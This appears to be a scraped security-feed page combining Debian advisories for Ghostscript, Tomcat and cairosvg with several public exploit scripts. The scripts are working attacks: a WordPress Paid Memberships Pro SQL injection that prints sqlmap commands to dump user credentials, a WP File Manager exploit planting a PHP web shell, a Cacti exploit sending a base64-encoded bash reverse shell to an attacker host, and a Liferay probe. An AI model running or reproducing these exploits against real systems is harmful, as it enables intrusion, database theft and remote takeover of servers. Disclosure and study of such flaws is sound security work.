Debian Linux Security Advisory 5383-1 - It was discovered that Ghostscript, the GPL PostScript/PDF interpreter, is prone to a buffer overflow vulnerability in the (T)BCP encoding filters, which could result in the execution of arbitrary code if malformed document files are processed (despite the -dSAFER sandbox being enabled).

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5383-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoApril 05, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ghostscriptCVE ID         : CVE-2023-28879Debian Bug     : 1033757It was discovered that Ghostscript, the GPL PostScript/PDF interpreter,is prone to a buffer overflow vulnerability in the (T)BCP encodingfilters, which could result in the execution of arbitrary code ifmalformed document files are processed (despite the -dSAFER sandboxbeing enabled).For the stable distribution (bullseye), this problem has been fixed inversion 9.53.3~dfsg-7+deb11u4.We recommend that you upgrade your ghostscript packages.For the detailed security status of ghostscript please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/ghostscriptFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmQt3rNfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0SoRRAAiGi3uTGuwMOc2Nh6RAqZ+vUewF+B0NUkGFAI0SJCaD5J8ka0qLDoG9pNzm5hotukboDIkG+r6jYE0BpGGReQNtstsmQfFUc8HWbe7wyTNv+r8HADU9Cfe44RJd1yVokt4opHU16D+OJC4Ffdm0iQt6iW1Ua2MbftJH7IF1c+fL7wST45WZz6z6dlac0cRPHn17JMH9oH0fsR+A2dBrCIIVdAQT2Rb1y9WpzAALZ92PfNA0DsCqytkaod6Xxd8lYGVd46nFz8gcpGi6JSrGxnegTlc4QWkTF5Xvn1hTyzN4ciWHhzzvE1IzWinFUtELH3/1vbhcyGRFSjjzcfSZhkYqnAFeA28skgTaNV4W8M3RxvPSSd6ElcUvJEqX1Sk3o6q4fKLS42bnNAlB54FsJGsoue4ihn+1gOwp6bVTHmyOPAWbdZeVWrCfllsA3JyGTcGw8pkDxxXfYJk+QnFtH6h+X5/tBXL2iXxpKTd1i65ZGnEQF5VRR9WE4Mx/afmsE7az6MS6m6GffiH9dyp+zRPKnvPMWdABatNYXPDUpl4ciFQC3BcU7lcJ7b56nvAycgRRiAcAMO8q88jDAN9TABrAupW/Z9psa27ANGp4qpdJ9mIpeQI+T1bfAwJjtlKgN6zU63Ij8CiZeVEWbMAm5McRldbC3jiWYv2W/RSOmL7So=ZcFg-----END PGP SIGNATURE-----

Debian Security Advisory 5383-1

Debian Linux Security Advisory 5381-1 - Several security vulnerabilities have been discovered in the Tomcat servlet and JSP engine.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5381-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
April 05, 2023                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : tomcat9  
CVE ID         : CVE-2022-42252 CVE-2022-45143 CVE-2023-28708  
Debian Bug     : 1033475

Several security vulnerabilities have been discovered in the Tomcat  
servlet and JSP engine.

CVE-2022-42252

    Apache Tomcat was configured to ignore invalid HTTP headers via setting  
    rejectIllegalHeader to false. Tomcat did not reject a request containing an  
    invalid Content-Length header making a request smuggling attack possible if  
    Tomcat was located behind a reverse proxy that also failed to reject the  
    request with the invalid header.

CVE-2022-45143

    The JsonErrorReportValve in Apache Tomcat did not escape the type, message  
    or description values. In some circumstances these are constructed from  
    user provided data and it was therefore possible for users to supply values  
    that invalidated or manipulated the JSON output.

CVE-2023-28708

    When using the RemoteIpFilter with requests received from a reverse proxy  
    via HTTP that include the X-Forwarded-Proto header set to https, session  
    cookies created by Apache Tomcat did not include the secure attribute. This  
    could result in the user agent transmitting the session cookie over an  
    insecure channel.

For the stable distribution (bullseye), these problems have been fixed in  
version 9.0.43-2~deb11u6.

We recommend that you upgrade your tomcat9 packages.

For the detailed security status of tomcat9 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/tomcat9

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmQt0zZfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeTvzxAAhrAcR/ZgJwe/4qeekO90f4YaCAoJhq7Fq4K6Wj5yM8dllX1IgTy7sweC  
G/GLe62O5snepEI6Fjfy3exkKieSYvsinGxUUcn3CjPYgpLfEDrRGhpWY1y0NPhQ  
NC6iFud2yJIfqI0Ns6h6rhq3F1Blp8iqBWqQiNdEAnZR+jqgqw/qtfa2GbsMLwI2  
so5EZBS3I2of6dCdvS71z8h2Mwf6AbsJh9f96BzlbnNZbGGGp46aIq/VtBUGwrtq  
CA8jrBNtsRT4sMsNp/qqbwLJwkSUxrOqALmJT35FGx9UnZCRld/UNonDpOM85Kia  
GdWE9aJ/A8p+i7vOivNserDBplDnWqug+NygYBmDUigwWfn2mqFIZvBbnp7lQp1z  
udNdTrvSnBSvLSnFUk97Qk3+oTLIO5YtmtXoHCDcGoKe6BAUbe9VYvHDNCNSDfD+  
vu2nv4cLGtI7SKNRN64B7d44z/sDK6o3ymGZEI+HT8dNFTA702m1AuDl/P/Zms7I  
2WKewbQBYrPbLOZE7sreyK8r84EAWR6o4VFAI/pkggckiFWcwdBVVsn0AV1WbtKo  
Z0R6DBFeyaYNrNh8TUDomJRySrV3sft48b5fLBNm6TQUzuTjbRLO0wYVXGywIU45  
aafJ+8bOP9EjhEF+erSIW7/dMm07hODtSL5QymPQlvmDmq7JM7g=XJMU  
-----END PGP SIGNATURE-----

Debian Security Advisory 5381-1

Debian Linux Security Advisory 5382-1 - It was reported that cairosvg, a SVG converter based on Cairo, can send requests to external hosts when processing specially crafted SVG files with external file resource loading. An attacker can take advantage of this flaw to perform a server-side request forgery or denial of service. Fetching of external files is disabled by default with this update.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5382-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoApril 05, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : cairosvgCVE ID         : CVE-2023-27586Debian Bug     : 1033295It was reported that cairosvg, a SVG converter based on Cairo, can sendrequests to external hosts when processing specially crafted SVG fileswith external file resource loading. An attacker can take advantage ofthis flaw to perform a server-side request forgery or denial of service.Fetching of external files is disabled by default with this update.For the stable distribution (bullseye), this problem has been fixed inversion 2.5.0-1.1+deb11u1.We recommend that you upgrade your cairosvg packages.For the detailed security status of cairosvg please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/cairosvgFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmQt1clfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0SHSA/+JRGHd5ccJTCZWYjtXDsq3tjP77dofbJW24Q+jEa22iQNkHHaW+k7jA+0DupIu6apNuA8WoGbBYEA24zG0c/XplIKYC7N0e+23wrX0pbamNyENIkWtFKSeY0UnYcNCSD+rL3GasVKiUOvdaWk7PZqxgIU1+ORgnvDVUHY2BB15cEVDKAvcwIrd71KkU6JbGdAoufek30UszsyMTs+ULp00uErgzq3jrxnJ5NCAnj8i7sI+DGY/aqEkOFEgZi7gIRDkK68VPMxQAUFCB7n/vIsqFrJTdwJ3xIhaZixEXgbLr4TBY1VhqixljNijSq2A72lTqotiKbXLiBy8l2vf+9T1au9qhImMViN3Sr6NDm3mjc/2wQv8ECopMiXMsbaJOjS/Fslbzc6jleK+xvhwkpwqbOYd9eyhX5FEEGdzHRJR093dy7Rp1t58QIkjOw4gS5psq6YEDtcTwyA7CAUZpZ0KGPiaM9+sY68iFsIa/b3HKnkGD+/Xp727CZLStSTYx/LOB/VSGOhxmSxQMpVJ9UMcFoCFfq+4xij1losWprs4nbEa/4CsPWWYuL/eWuMywMvev9adj55x6voruJ2eKxFFiQ+wR2JcdKXY5oXqzNAfjKLLHPjzq2co0OsIJ9x3kAM9eCct13Iq1gsz4tuj3zJgI4458cci5iMiRKjwdsClAM=vgG/-----END PGP SIGNATURE-----

Debian Security Advisory 5382-1

Unified Remote version 3.13.0 suffers from a remote code execution vulnerability.

Unified Remote 3.13.0 Remote Code Execution

In Docker Desktop 4.17.x the Artifactory Integration falls back to sending registry credentials over plain HTTP if the HTTPS health check has failed. A targeted network sniffing attack can lead to a disclosure of sensitive information. Only users who have Access Experimental Features enabled and have logged in to a private registry are affected.

CVE-2023-1802: Docker Desktop release notes

Liferay Portal version 6.2.5 suffers from an insecure permissions vulnerability.

**Liferay Portal 6.2.5 Insecure Permissions**

Posted Apr 5, 2023

Authored by fu2x2000

Liferay Portal version 6.2.5 suffers from an insecure permissions vulnerability.

tags | exploit

advisories | CVE-2021-33990

SHA-256 | e3e411dfd9f5109ca37b6290d45f0e2d70ef14dec30d730427fdf7979b0850b5

Download | Favorite | View

**Liferay Portal 6.2.5 Insecure Permissions**

    # Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/# Date: 2021/05# Exploit Author: fu2x2000# Version: Liferay Portal 6.2.5 or later# CVE : CVE-2021-33990 import requestsimport jsonprint (" Search this on Google #Dork for liferay-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")url ="URL Goes Here/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"req = requests.get(url)print reqsta = req.status_codeif sta == 200:print ('Life Vulnerability exists')cook = urlprint cookinject = "Command=FileUpload&Type=File&CurrentFolder=/"#cook_inject = cook+inject#print cook_injectelse:print ('not found try a another method')print ("solution restrict access and user groups")

**File Tags**

*   ActiveX (932)
*   Advisory (80,663)
*   Arbitrary (15,931)
*   BBS (2,859)
*   Bypass (1,655)
*   CGI (1,022)
*   Code Execution (7,067)
*   Conference (677)
*   Cracker (840)
*   CSRF (3,307)
*   DoS (22,956)
*   Encryption (2,359)
*   Exploit (50,803)
*   File Inclusion (4,186)
*   File Upload (951)
*   Firewall (821)
*   Info Disclosure (2,691)
*   Intrusion Detection (876)
*   Java (2,961)
*   JavaScript (831)
*   Kernel (6,471)
*   Local (14,314)
*   Magazine (586)
*   Overflow (12,549)
*   Perl (1,419)
*   PHP (5,111)
*   Proof of Concept (2,297)
*   Protocol (3,505)
*   Python (1,488)
*   Remote (30,329)
*   Root (3,538)
*   Rootkit (502)
*   Ruby (603)
*   Scanner (1,633)
*   Security Tool (7,825)
*   Shell (3,138)
*   Shellcode (1,209)
*   Sniffer (890)
*   Spoof (2,182)
*   SQL Injection (16,180)
*   TCP (2,385)
*   Trojan (687)
*   UDP (881)
*   Virus (663)
*   Vulnerability (31,400)
*   Web (9,473)
*   Whitepaper (3,740)
*   x86 (948)
*   XSS (17,599)
*   Other

**File Archives**

*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,960)
*   BSD (372)
*   CentOS (56)
*   Cisco (1,919)
*   Debian (6,715)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (340)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,194)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (12,962)
*   Slackware (941)
*   Solaris (1,609)
*   SUSE (1,444)
*   Ubuntu (8,470)
*   UNIX (9,209)
*   UnixWare (185)
*   Windows (6,534)
*   Other

Liferay Portal 6.2.5 Insecure Permissions

WordPress Paid Memberships Pro plugin version 2.9.8 suffers from a remote SQL injection vulnerability.

    #!/usr/bin/env python# Exploit Title: Paid Memberships Pro  v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection# Exploit Author: r3nt0n# CVE: CVE-2023-23488# Date: 2023/01/24# Vulnerability discovered by Joshua Martinelle# Vendor Homepage: https://www.paidmembershipspro.com# Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip# Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9# Version: < 2.9.8# Tested on: Debian 11 - WordPress 6.1.1 - Paid Memberships Pro 2.9.7## Running this script against a WordPress instance with Paid Membership Pro plugin# tells you if the target is vulnerable.# As the SQL injection technique required to exploit it is Time-based blind, instead of# trying to directly exploit the vuln, it will generate the appropriate sqlmap command# to dump the whole database (probably very time-consuming) or specific chose data like# usernames and passwords.## Usage example: python3 CVE-2023-23488.py http://127.0.0.1/wordpressimport sysimport requestsdef get_request(target_url, delay="1"):    payload = "a' OR (SELECT 1 FROM (SELECT(SLEEP(" + delay + ")))a)-- -"    data = {'rest_route': '/pmpro/v1/order',            'code': payload}    return requests.get(target_url, params=data).elapsed.total_seconds()print('Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n')if len(sys.argv) != 2:    print('Usage: {} <target_url>'.format("python3 CVE-2023-23488.py"))    print('Example: {} http://127.0.0.1/wordpress'.format("python3 CVE-2023-23488.py"))    sys.exit(1)target_url = sys.argv[1]try:    print('[-] Testing if the target is vulnerable...')    req = requests.get(target_url, timeout=15)except:    print('{}[!] ERROR: Target is unreachable{}'.format(u'\033[91m',u'\033[0m'))    sys.exit(2)if get_request(target_url, "1") >= get_request(target_url, "2"):    print('{}[!] The target does not seem vulnerable{}'.format(u'\033[91m',u'\033[0m'))    sys.exit(3)print('\n{}[*] The target is vulnerable{}'.format(u'\033[92m', u'\033[0m'))print('\n[+] You can dump the whole WordPress database with:')print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump'.format(target_url))print('\n[+] To dump data from specific tables:')print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users'.format(target_url))print('\n[+] To dump only WordPress usernames and passwords columns (you should check if users table have the default name):')print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users -C user_login,user_pass'.format(target_url))sys.exit(0)

WordPress Paid Memberships Pro 2.9.8 SQL Injection

WordPress File Manager plugin versions 6.0 through 6.9 suffer from a remote shell upload vulnerability.

    #!/usr/bin/env# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE# Date: [ 22-01-2023 ]# Exploit Author: [BLY]# Vendor Homepage: [https://wpscan.com/vulnerability/10389]# Version: [ File Manager plugin 6.0-6.9]# Tested on: [ Debian ]# CVE : [ CVE-2020-25213 ]import sys,signal,time,requestsfrom bs4 import BeautifulSoup#from pprint import pprintdef handler(sig,frame):  print ("[!]Saliendo")  sys.exit(1)signal.signal(signal.SIGINT,handler)def commandexec(command):  exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"  params = {    "cmd":command  }  r=requests.get(exec_url,params=params)  soup = BeautifulSoup(r.text, 'html.parser')  text = soup.get_text()  print (text)def exploit():  global url  url = sys.argv[1]  command = sys.argv[2]  upload_url = url+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"  headers = {      'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",      'Connection': "close"   }  payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"  try:    r=requests.post(upload_url,data=payload,headers=headers)    #pprint(r.json())    commandexec(command)  except:    print("[!] Algo ha salido mal...")def help():  print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")  print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")if __name__ == '__main__':  if len(sys.argv) != 3:    help()  else:    exploit()

WordPress File Manager 6.9 Shell Upload

mod_auth_openidc is an authentication and authorization module for the Apache 2.x HTTP server that implements the OpenID Connect Relying Party functionality. In versions 2.0.0 through 2.4.13.1, when `OIDCStripCookies` is set and a crafted cookie supplied, a NULL pointer dereference would occur, resulting in a segmentation fault. This could be used in a Denial-of-Service attack and thus presents an availability risk. Version 2.4.13.2 contains a patch for this issue. As a workaround, avoid using `OIDCStripCookies`.

1.  Releases
2.  v2.4.13.2

**Security**

*   CVE-2023-28625: prevent core dump when OIDCStripCookies is set and a crafted Cookie header is supplied  
    GHSA-f5xw-rvfr-24qr
*   fix code scanning alerts from 2 code scanning tools all over the place

**Features**

*   add support for Elliptic Curve signing/encryption keys in addtiion to RSA keys,  
    i.e. client keys configured in OIDCPrivateKeyFiles/OIDCPublicKeyFiles, published on OIDCClientJwksUri  
    and used in private_key_jwt authentication, encrypted id_token's, request objects/uri's,  
    but also statically configured provider keys in OIDCOAuthVerifyCertFiles and OIDCProviderVerifyCertFiles
*   record authorization errors in environment variable OIDC_AUTHZ_ERROR  
    so its value can be used in logs e.g. with HTTP 401 responses in the access log:  
        LogFormat "%h %l %u %t %U %401{OIDC_AUTHZ_ERROR}e %>s %b" combined  
    also log authorization errors with oidc_debug instead of oidc_info

**Bugfixes**

*   fix for omitting the kid# prefix in OIDCPublicKeyFiles/OIDCPrivateKeyFiles and other certificate configuration primitives when linked against OpenSSL <= 1.0.x
*   allow target_link_uri's without a path in 3rd-party-init SSO with a multi-provider setup
*   correct cookie path printout in error log when target_link_uri does not match OIDCCookiePath

**Commercial**

*   binary packages for various other platforms such as Microsoft Windows 64bit/32bit, Red Hat Enterprise Linux 6, Red Hat Enterprise Linux 7/8 on Power PC (ppc64, ppc64le), Oracle Linux 6/7, older Ubuntu and Debian distro's, Oracle HTTP Server 11.1/12.1/12.2, IBM HTTP Server 8/9, Solaris 11.4, IBM AIX 7.2 and Mac OS X are available under a commercial agreement via sales@openidc.com
*   support for Redis over TLS, Redis (TLS) Sentinel, and Redis (TLS) Cluster is available under a commercial license via sales@openidc.com

CVE-2023-28625: Release release 2.4.13.2 · OpenIDC/mod_auth_openidc

Cacti version 1.2.22 suffers from a remote command execution vulnerability.

    # Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)# Exploit Author: Riadh BOUCHAHOUA# Discovery Date: 2022-12-08 # Vendor Homepage: https://www.cacti.net/# Software Links : https://github.com/Cacti/cacti# Tested Version: 1.2.2x <= 1.2.22# CVE: CVE-2022-46169# Tested on OS: Debian 10/11#!/usr/bin/env python3import randomimport httpx, urllibclass Exploit:    def __init__(self, url, proxy=None, rs_host="",rs_port=""):        self.url = url         self.session = httpx.Client(headers={"User-Agent": self.random_user_agent()},verify=False,proxies=proxy)        self.rs_host = rs_host        self.rs_port = rs_port    def exploit(self):        # cacti local ip from the url for the X-Forwarded-For header        local_cacti_ip  = self.url.split("//")[1].split("/")[0]            headers = {            'X-Forwarded-For': f'{local_cacti_ip}'        }                revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'"        import base64        b64_revshell = base64.b64encode(revshell.encode()).decode()        payload = f";echo {b64_revshell} | base64 -d | bash -"        payload = urllib.parse.quote(payload)        urls = []                # Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell)        for host_id in range(1,100):            for local_data_ids in range(1,100):                urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}")                        for url in urls:            r = self.session.get(url,headers=headers)            print(f"{r.status_code} - {r.text}" )        pass    def random_user_agent(self):        ua_list = [            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",            "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",        ]        return random.choice(ua_list)def parse_args():    import argparse        argparser = argparse.ArgumentParser()    argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)")    argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True)    argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True)    return argparser.parse_args()def main() -> None:    # Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL     args = parse_args()    e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port)    e.exploit()if __name__ == "__main__":    main()

Tag

#debian